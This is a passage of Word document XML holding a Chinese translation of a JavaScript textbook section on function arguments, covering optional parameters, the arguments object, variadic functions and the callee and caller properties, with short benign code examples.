      <w:bookmarkStart w:id="199" w:name="8_3_Han_Shu_De_Shi_Can_He_Xing_Can_"/>
      <w:r>
        <w:t>8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数的实参和形参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数定义并未指定函数形参的类型，函数调用也未对传入的实参值做任何类型检查。实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数调用甚至不检查传入形参的个数。下面几节将会讨论当调用函数时的实参个数和声明的形参个数不匹配时出现的状况，同样说明了如何显式测试函数实参的类型，以避免非法的实参传入函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="8_3_1_Ke_Xuan_Xing_Can_"/>
      <w:r>
        <w:t>8.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可选形参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当调用函数的时候传入的实参比函数声明时指定的形参个数要少，剩下的形参都将设置为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值。因此在调用函数时形参是否可选以及是否可以省略应当保持较好的适应性。为了做到这一点，应当给省略的参数赋一个合理的默认值，来看这个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中可枚举的属性名追加至数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中，并返回这个数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果省略</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，则创建一个新数组并返回这个新数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getPropertyNames(o,/*optional*/a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a===undefined)a=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>如果未定义，则使用新数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var property in o)a.push(property);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数调用可以传入</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个或</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>个实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var a=getPropertyNames(o);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性存储到一个新数组中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>getPropertyNames(p,a);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的属性追加至数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在第一行代码中不使用</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符，这是一种习惯用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=a||[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回忆一下，</w:t>
      </w:r>
      <w:r>
        <w:t>4.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符，如果第一个实参是真值的话就返回第一个实参；否则返回第二个实参。在这个场景下，如果作为第二个实参传入任意对象，那么函数就会使用这个对象。如果省略掉第二个实参（或者传递</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>以及其他任何假值），那么就新创建一个空数组，并赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，当用这种可选实参来实现函数时，需要将可选实参放在实参列表的最后。那些调用你的函数的程序员是没办法省略第一个实参并传入第二个实参的，它必须将</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>作为第一个实参显式传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。同样注意在函数定义中使用注释</w:t>
      </w:r>
      <w:r>
        <w:t>/*optional*/</w:t>
      </w:r>
      <w:r>
        <w:t>来强调形参是可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="8_3_2_Ke_Bian_Chang_De_Shi_Can_Lie_Biao_"/>
      <w:r>
        <w:t>8.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可变长的实参列表：实参对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当调用函数的时候传入的实参个数超过函数定义时的形参个数时，没有办法直接获得未命名值的引用。参数对象解决了这个问题。在函数体内，标识符</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>是指向实参对象的引用，实参对象是一个类数组对象（</w:t>
      </w:r>
      <w:r>
        <w:t>参照</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节），这样可以通过数字下标就能访问传入函数的实参值，而不用非要通过名字来得到实参。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>假设定义了函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，它的实参只有一个</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>。如果调用这个函数时传入两个实参，第一个实参可以通过参数名</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>来获得，也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>arguments[0]</w:t>
      </w:r>
      <w:r>
        <w:t>来得到。第二个实参只能通过</w:t>
      </w:r>
      <w:r>
        <w:t>arguments[1]</w:t>
      </w:r>
      <w:r>
        <w:t>来得到。此外，和真正的数组一样，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>也包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，用以标识其所包含元素的个数。因此，如果调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>时传入两个参数，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>的值就是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实参对象在很多地方都非常有用，下面的</w:t>
      </w:r>
      <w:r>
        <w:t>例子展示了使用它来验证实参的个数，从而调用正确的逻辑，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>本身不会这么做：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(x,y,z)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先，验证传入实参的个数是否正确</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length!=3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("function f called with"+arguments.length+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"arguments,but it expects 3 arguments.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>再执行函数的其他逻辑</w:t>
      </w:r>
      <w:r>
        <w:t>...</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需要注意的是，通常不必像这样检查实参个数。</w:t>
      </w:r>
      <w:r>
        <w:t>大多数情况下</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的默认行为是可以满足需要的：省略的实参都将是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，多出的参数会自动省略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实参对象有一个重要的用处，就是让函数可以操作任意数量的实参。下面的函数就可以接收任意数量的实参，并返回传入实参的最大值（内置函数</w:t>
      </w:r>
      <w:r>
        <w:t>Max.max()</w:t>
      </w:r>
      <w:r>
        <w:t>的功能与之类似）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function max(/*...*/){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var max=Number.NEGATIVE_INFINITY;//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历实参，查找并记住最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a</w:t>
      </w:r>
      <w:r>
        <w:t>rguments[i]</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>max)max=arguments[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return max;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var largest=max(1,10,100,2,3,1000,4,5,10000,6);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>10000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似这种函数可以接收任意个数的实参，这种函数也称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不定实参函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>varargs function</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>，这个术语源自古老的</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>语言。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，不定实参函数的实参个数不能为零，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments[]</w:t>
      </w:r>
      <w:r>
        <w:t>对象最适合的应用场景是在这样一类函数中，这类函数包含固定个数的命名和必需参数，以及随后个数不定的可选实参。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>记住，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>并不是真正的数组，它是一个实参对象。每个实参对象都包含以数字为索引的一组元素以及</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但它毕竟不是真正的数组。可以这样理解，它是一个对象，只是碰巧具有以数字为索引的属性。参照</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节以获得更多关于类数组对象的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组对象包含一个非同寻常的特性。在非严格模式下，当一个函数包含若干形参，实参对象的数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>是函数形参所对应实参的别名，实参对象中以数字索引，并且形参名称可以认为是相同变量的不同命名。通过实参名字来修改实参值的话，通过</w:t>
      </w:r>
      <w:r>
        <w:t>arguments[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组也可以获取到更改后的值，下面这个例子清楚地说明了这一点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(x);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出实参的初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>arguments[0]=null;//</w:t>
      </w:r>
      <w:r>
        <w:t>修改实参数组的元素同样会修改</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(x);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"null"</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如果实参对象是一个普遍数组的话，第二条</w:t>
      </w:r>
      <w:r>
        <w:t>console.log(x)</w:t>
      </w:r>
      <w:r>
        <w:t>语句的结果绝对不会</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments[0]</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>指代同一个值，修改其中一个的值会影响到另一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中移除了实参对象的这个特殊特性。在严格模式下还有一点（和非严格模式下相比的）不同，在非严格模式中，函数里的</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>仅仅是一个标识符，在严格模式中，它变成了一个保留字。严格模式中的函数无法使用</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>作为形参名或局部变量名，也不能给</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>赋值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了数组元素，实参对象还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMASc</w:t>
      </w:r>
      <w:r>
        <w:t>ript 5</w:t>
      </w:r>
      <w:r>
        <w:t>严格模式中，对这两个属性的读写操作都会产生一个类型错误。而在非严格模式下，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准规范规定</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代当前正在执行的函数。</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>是非标准的，但大多数浏览器都实现了这个属性，它指代调用当前正在执行的函数的函数。通过</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以访问调用栈。</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>属性在某些时候会非常有用，比如在匿名函数中通过</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>来递归地调用自身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var factorial=function(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x*arguments.cal</w:t>
      </w:r>
      <w:r>
        <w:t>lee(x-1);</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02" w:name="8_3_3_Jiang_Dui_Xiang_Shu_Xing_Yong_Zuo_"/>
      <w:r>
        <w:t>8.3.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　将对象属性用做实参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当一个函数包含超过三个形参时，对于程序员来说，要记住调用函数中实参的正确顺序实在让人头疼。每次调用这个函数时都要不厌其烦地查阅文档，为了不让程序员每次都翻阅手册这么麻烦，最好通过名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的形式来传入参数，这样参数的顺序就无关紧要了。为了实现这种风格的方法调用，定义函数的时候，传入的实参都写入一个单独的对象之中，在调用的时候传入一个对象，对象中的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对是真正需要的实参数据。下面的代码就展示了这种风格的函数调用，这种写法允许在函数中设置省略参数的默认</w:t>
      </w:r>
      <w:r>
        <w:t>值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将原始数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>元素复制至目标数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
